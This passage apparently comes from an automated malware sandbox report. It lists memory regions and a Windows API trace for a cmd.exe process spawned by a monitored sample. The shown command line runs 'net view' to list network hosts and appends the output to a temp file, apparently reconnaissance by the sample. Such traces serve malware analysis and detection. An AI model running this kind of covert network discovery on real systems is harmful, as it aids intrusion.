"oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2654 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2655 start_va = 0x7ff977b60000 end_va = 0x7ff977ca0fff entry_point = 0x7ff977b60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2656 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 227 os_tid = 0x930 Thread: id = 228 os_tid = 0x95c Thread: id = 229 os_tid = 0x924 Process: id = "25" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x384f2000" os_pid = "0x978" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x834" cmd_line = "cmd /C \"net view >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2666 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2667 start_va = 0x2a32480000 end_va = 0x2a3249ffff entry_point = 0x0 region_type = private name = "private_0x0000002a32480000" filename = "" Region: id = 2668 start_va = 0x2a324a0000 end_va = 0x2a324b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002a324a0000" filename = "" Region: id = 2669 start_va = 0x2a324c0000 end_va = 0x2a325bffff entry_point = 0x0 region_type = private name = "private_0x0000002a324c0000" filename = "" Region: id = 2670 start_va = 0x2a325c0000 end_va = 0x2a325c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002a325c0000" filename = "" Region: id = 2671 start_va = 0x2a325d0000 end_va = 0x2a325d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002a325d0000" filename = "" Region: id = 2672 start_va = 0x2a325e0000 end_va = 0x2a325e1fff entry_point = 0x0 region_type = private name = "private_0x0000002a325e0000" filename = "" Region: id = 2673 start_va = 0x7df5ff630000 end_va = 0x7ff5ff62ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff630000" filename = "" Region: id = 2674 start_va = 0x7ff60cf70000 end_va = 0x7ff60cf92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff60cf70000" filename = "" Region: id = 2675 start_va = 0x7ff60cf97000 end_va = 0x7ff60cf97fff entry_point = 0x0 region_type = private name = "private_0x00007ff60cf97000" filename = "" Region: id = 2676 start_va = 0x7ff60cf9e000 end_va = 0x7ff60cf9ffff entry_point = 0x0 region_type = private name = "private_0x00007ff60cf9e000" filename = "" Region: id = 2677 start_va = 0x7ff60d9c0000 end_va = 0x7ff60da18fff entry_point = 0x7ff60d9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2678 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2679 start_va = 0x2a32760000 end_va = 0x2a3285ffff entry_point = 0x0 region_type = private name = "private_0x0000002a32760000" filename = "" Region: id = 2680 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2681 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2721 start_va = 0x2a32480000 end_va = 0x2a3248ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002a32480000" filename = "" Region: id = 2722 start_va = 0x2a32490000 end_va = 0x2a32496fff entry_point = 0x0 region_type = private name = "private_0x0000002a32490000" filename = "" Region: id = 2723 start_va = 0x2a325f0000 end_va = 0x2a326adfff entry_point = 0x2a325f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2724 start_va = 0x2a32860000 end_va = 0x2a3295ffff entry_point = 0x0 region_type = private name = "private_0x0000002a32860000" filename = "" Region: id = 2725 start_va = 0x2a32a60000 end_va = 0x2a32a6ffff entry_point = 0x0 region_type = private name = "private_0x0000002a32a60000" filename = "" Region: id = 2726 start_va = 0x7ff60ce70000 end_va = 0x7ff60cf6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff60ce70000" filename = "" Region: id = 2727 start_va = 0x7ff60cf9c000 end_va = 0x7ff60cf9dfff entry_point = 0x0 region_type = private name = "private_0x00007ff60cf9c000" filename = "" Region: id = 2728 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2729 start_va = 0x2a326b0000 end_va = 0x2a326b6fff entry_point = 0x0 region_type = private name = "private_0x0000002a326b0000" filename = "" Region: id = 2730 start_va = 0x2a32a70000 end_va = 0x2a32da6fff entry_point = 0x2a32a70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 231 os_tid = 0xb10 [0263.555] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff60d9c0000 [0263.555] __set_app_type (_Type=0x1) [0263.555] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff60d9d44a0) returned 0x0 [0263.555] __getmainargs (in: _Argc=0x7ff60d9ef0e8, _Argv=0x7ff60d9ef0f0, _Env=0x7ff60d9ef0f8, _DoWildCard=0, _StartInfo=0x7ff60d9ef104 | out: _Argc=0x7ff60d9ef0e8, _Argv=0x7ff60d9ef0f0, _Env=0x7ff60d9ef0f8) returned 0 [0263.555] GetCurrentThreadId () returned 0xb10 [0263.555] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb10) returned 0x6c [0263.555] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0263.555] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="SetThreadUILanguage") returned 0x7ff977acd550 [0263.556] SetThreadUILanguage (LangId=0x0) returned 0x409 [0263.558] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0263.558] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2a325bfb28 | out: phkResult=0x2a325bfb28*=0x0) returned 0x2 [0263.558] VirtualQuery (in: lpAddress=0x2a325bfb14, lpBuffer=0x2a325bfa90, dwLength=0x30 | out: lpBuffer=0x2a325bfa90*(BaseAddress=0x2a325bf000, AllocationBase=0x2a324c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0263.558] VirtualQuery (in: lpAddress=0x2a324c0000, lpBuffer=0x2a325bfa90, dwLength=0x30 | out: lpBuffer=0x2a325bfa90*(BaseAddress=0x2a324c0000, AllocationBase=0x2a324c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0263.558] VirtualQuery (in: lpAddress=0x2a324c1000, lpBuffer=0x2a325bfa90, dwLength=0x30 | out: lpBuffer=0x2a325bfa90*(BaseAddress=0x2a324c1000, AllocationBase=0x2a324c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0263.558] VirtualQuery (in: lpAddress=0x2a324c4000, lpBuffer=0x2a325bfa90, dwLength=0x30 | out: lpBuffer=0x2a325bfa90*(BaseAddress=0x2a324c4000, AllocationBase=0x2a324c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0263.558] VirtualQuery (in: lpAddress=0x2a325c0000, lpBuffer=0x2a325bfa90, dwLength=0x30 | out: lpBuffer=0x2a325bfa90*(BaseAddress=0x2a325c0000, AllocationBase=0x2a325c0000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0xffffd000)) returned 0x30 [0263.558] GetConsoleOutputCP () returned 0x1b5 [0263.559] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0263.559] SetConsoleCtrlHandler (HandlerRoutine=0x7ff60d9e15d0, Add=1) returned 1 [0263.559] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.559] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 1 [0263.559] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.559] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff60d9f85ec | out: lpMode=0x7ff60d9f85ec) returned 1 [0263.560] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.560] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1 [0263.560] _get_osfhandle (_FileHandle=0) returned 0x20 [0263.560] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff60d9f85e8 | out: lpMode=0x7ff60d9f85e8) returned 1 [0263.560] _get_osfhandle (_FileHandle=0) returned 0x20 [0263.560] SetConsoleMode (hConsoleHandle=0x20, dwMode=0x1e7) returned 1 [0263.561] GetEnvironmentStringsW () returned 0x2a32765690* [0263.561] FreeEnvironmentStringsA (penv="=") returned 1 [0263.561] GetEnvironmentStringsW () returned 0x2a32765690* [0263.561] FreeEnvironmentStringsA (penv="=") returned 1 [0263.561] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2a325be9d8 | out: phkResult=0x2a325be9d8*=0x78) returned 0x0 [0263.561] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x0, lpData=0x2a325be9f0*=0x1, lpcbData=0x2a325be9d4*=0x1000) returned 0x2 [0263.561] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x4, lpData=0x2a325be9f0*=0x1, lpcbData=0x2a325be9d4*=0x4) returned 0x0 [0263.562] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x0, lpData=0x2a325be9f0*=0x1, lpcbData=0x2a325be9d4*=0x1000) returned 0x2 [0263.562] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x4, lpData=0x2a325be9f0*=0x0, lpcbData=0x2a325be9d4*=0x4) returned 0x0 [0263.562] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x4, lpData=0x2a325be9f0*=0x40, lpcbData=0x2a325be9d4*=0x4) returned 0x0 [0263.562] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x4, lpData=0x2a325be9f0*=0x40, lpcbData=0x2a325be9d4*=0x4) returned 0x0 [0263.562] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x0, lpData=0x2a325be9f0*=0x40, lpcbData=0x2a325be9d4*=0x1000) returned 0x2 [0263.562] RegCloseKey (hKey=0x78) returned 0x0 [0263.562] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2a325be9d8 | out: phkResult=0x2a325be9d8*=0x78) returned 0x0 [0263.562] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x0, lpData=0x2a325be9f0*=0x40, lpcbData=0x2a325be9d4*=0x1000) returned 0x2 [0263.562] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x4, lpData=0x2a325be9f0*=0x1, lpcbData=0x2a325be9d4*=0x4) returned 0x0 [0263.562] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x0, lpData=0x2a325be9f0*=0x1, lpcbData=0x2a325be9d4*=0x1000) returned 0x2 [0263.562] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x4, lpData=0x2a325be9f0*=0x0, lpcbData=0x2a325be9d4*=0x4) returned 0x0 [0263.562] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x4, lpData=0x2a325be9f0*=0x9, lpcbData=0x2a325be9d4*=0x4) returned 0x0 [0263.562] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x4, lpData=0x2a325be9f0*=0x9, lpcbData=0x2a325be9d4*=0x4) returned 0x0 [0263.562] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2a325be9d0, lpData=0x2a325be9f0, lpcbData=0x2a325be9d4*=0x1000 | out: lpType=0x2a325be9d0*=0x0, lpData=0x2a325be9f0*=0x9, lpcbData=0x2a325be9d4*=0x1000) returned 0x2 [0263.562] RegCloseKey (hKey=0x78) returned 0x0 [0263.563] time (in: timer=0x0 | out: timer=0x0) returned 0x5be0e006 [0263.563] srand (_Seed=0x5be0e006) [0263.563] GetCommandLineW () returned="cmd /C \"net view >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" [0263.563] GetCommandLineW () returned="cmd /C \"net view >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" [0263.563] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff60da00920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0263.563] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a32767800, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0263.563] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0263.563] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0263.563] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0263.563] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0263.563] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0263.563] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0263.563] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0263.563] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0263.563] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0263.563] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0263.563] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0263.563] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0263.564] GetEnvironmentStringsW () returned 0x2a32765690* [0263.564] FreeEnvironmentStringsA (penv="=") returned 1 [0263.564] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0263.564] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0263.564] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0263.564] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0263.564] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0263.564] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0263.564] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0263.564] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0263.564] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0263.564] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0263.564] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2a325bf7e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0263.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x2a325bf7e0, lpFilePart=0x2a325bf7c0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2a325bf7c0*="system32") returned 0x13 [0263.565] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0263.565] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x2a325bf4f0 | out: lpFindFileData=0x2a325bf4f0) returned 0x2a32760720 [0263.566] FindClose (in: hFindFile=0x2a32760720 | out: hFindFile=0x2a32760720) returned 1 [0263.566] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x2a325bf4f0 | out: lpFindFileData=0x2a325bf4f0) returned 0x2a32760720 [0263.567] FindClose (in: hFindFile=0x2a32760720 | out: hFindFile=0x2a32760720) returned 1 [0263.567] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0263.567] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0263.567] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0263.567] GetEnvironmentStringsW () returned 0x2a32767a10* [0263.567] FreeEnvironmentStringsA (penv="=") returned 1 [0263.567] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff60da00920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0263.568] GetConsoleOutputCP () returned 0x1b5 [0263.569] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0263.569] GetUserDefaultLCID () returned 0x409 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff60d9fc680, cchData=8 | out: lpLCData=":") returned 2 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2a325bf910, cchData=128 | out: lpLCData="0") returned 2 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2a325bf910, cchData=128 | out: lpLCData="0") returned 2 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2a325bf910, cchData=128 | out: lpLCData="1") returned 2 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff60d9fc690, cchData=8 | out: lpLCData="/") returned 2 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff60d9fc6e0, cchData=32 | out: lpLCData="Mon") returned 4 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff60d9fc720, cchData=32 | out: lpLCData="Tue") returned 4 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff60d9fc760, cchData=32 | out: lpLCData="Wed") returned 4 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff60d9fc7a0, cchData=32 | out: lpLCData="Thu") returned 4 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff60d9fc7e0, cchData=32 | out: lpLCData="Fri") returned 4 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff60d9fc820, cchData=32 | out: lpLCData="Sat") returned 4 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff60d9fc860, cchData=32 | out: lpLCData="Sun") returned 4 [0263.569] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff60d9fc6a0, cchData=8 | out: lpLCData=".") returned 2 [0263.570] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff60d9fc6c0, cchData=8 | out: lpLCData=",") returned 2 [0263.570] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0263.570] GetConsoleTitleW (in: lpConsoleTitle=0x2a327610b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0263.571] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0263.571] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="CopyFileExW") returned 0x7ff977ad25e0 [0263.571] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="IsDebuggerPresent") returned 0x7ff977ad1f90 [0263.571] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ff975423a10 [0263.572] _wcsicmp (_String1="net", _String2=")") returned 69 [0263.572] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0263.572] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0263.572] _wcsicmp (_String1="IF", _String2="net") returned -5 [0263.572] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0263.572] _wcsicmp (_String1="REM", _String2="net") returned 4 [0263.572] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0263.576] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.576] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.576] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.576] GetFileType (hFile=0x24) returned 0x2 [0263.576] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0263.576] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x2a325bf7d8 | out: lpMode=0x2a325bf7d8) returned 1 [0263.577] _dup (_FileHandle=1) returned 3 [0263.577] _close (_FileHandle=1) returned 0 [0263.577] _wcsicmp (_String1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1", _String2="con") returned -53 [0263.577] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\19e9.bin1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x2a325bf770, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24 [0263.577] _open_osfhandle (_OSFileHandle=0x24, _Flags=8) returned 1 [0263.577] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.577] GetFileType (hFile=0x24) returned 0x1 [0263.577] GetFileSize (in: hFile=0x24, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x857 [0263.577] SetFilePointer (in: hFile=0x24, lDistanceToMove=-1, lpDistanceToMoveHigh=0x2a325bf7d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2a325bf7d8*=0) returned 0x856 [0263.578] ReadFile (in: hFile=0x24, lpBuffer=0x2a325bf7e0, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2a325bf7e8, lpOverlapped=0x0 | out: lpBuffer=0x2a325bf7e0*, lpNumberOfBytesRead=0x2a325bf7e8*=0x1, lpOverlapped=0x0) returned 1 [0263.578] GetConsoleTitleW (in: lpConsoleTitle=0x2a325bf800, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0263.578] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0263.578] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0263.578] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0263.578] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0263.578] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0263.578] _wcsicmp (_String1="net", _String2="CD") returned 11 [0263.578] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0263.579] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0263.579] _wcsicmp (_String1="net", _String2="REN") returned -4 [0263.579] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0263.579] _wcsicmp (_String1="net", _String2="SET") returned -5 [0263.579] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0263.579] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0263.579] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0263.579] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0263.579] _wcsicmp (_String1="net", _String2="MD") returned 1 [0263.579] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0263.579] _wcsicmp (_String1="net", _String2="RD") returned -4 [0263.579] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0263.579] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0263.579] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0263.579] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0263.579] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0263.579] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0263.579] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0263.579] _wcsicmp (_String1="net", _String2="VER") returned -8 [0263.579] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0263.579] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0263.579] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0263.579] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0263.579] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0263.579] _wcsicmp (_String1="net", _String2="START") returned -5 [0263.579] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0263.579] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0263.579] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0263.579] _wcsicmp (_String1="net", _String2="PUSHD") returned 